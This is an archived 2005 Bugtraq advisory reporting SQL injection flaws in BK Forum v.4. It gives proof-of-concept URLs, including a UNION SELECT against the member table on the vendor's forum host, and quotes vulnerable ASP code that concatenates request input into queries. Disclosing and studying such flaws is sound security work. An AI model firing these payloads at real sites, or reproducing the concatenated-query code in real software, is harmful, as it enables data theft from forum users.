lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 23 Apr 2005 14:46:35 -0000
From: dcrab <dcrab@...kerscenter.com>
To: bugtraq@...urityfocus.com
Subject: Multiple Sql injection vulnerabilities in BK Forum v.4




Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple Sql injection vulnerabilities in BK Forum v.4
Date: 23/04/2005

Vendor: BKdev
Vendor Website: http://www.bkdev.net
Summary: There are, multiple sql injection vulnerabilities in bk forum v.4.


Proof of Concept Exploits: 

http://forum.bkdev.net/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20'dc'
       [CODE] 
       id = request.querystring("id")
        sql = "select * from Member where memID = " & id
        set rs = conn.execute(sql)
       [/CODE]
http://forum.bkdev.net/forum.asp?forum='SQL INJECTION
       [CODE]
        id = request.querystring("id")
        sql = "select * from Member where memID = " & id
        set rs = conn.execute(sql)
       [/CODE]
http://forum.bkdev.net/register.asp

All the form values are vulnerable to sql injection
       [CODE]
         sql = "insert into Member (memName, memPassword, memFirstName, memLastName, memEmail, memHomepage, " & _
                                                                        "memDate, memLevel, memSignature, memPic, memAbout, memAcceptNotification, memShowAvatar, memLoggedOn, " & _
                                                                        "memLastActive) values ('" & memname & "', '" & mempw & "', '" & firstname & "', '" & lastname & "', " & _
                                                                        "'" & email & "', '" & homepage & "', #" & now & "#, " & LEVEL_MEMBER & ", '" & signature & "', " & _
                                                                        "'" & picture & "', '" & about & "', " & notify & ", " & avatar & ", " & false & ", #" & now & "#)"
       [/CODE]


Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ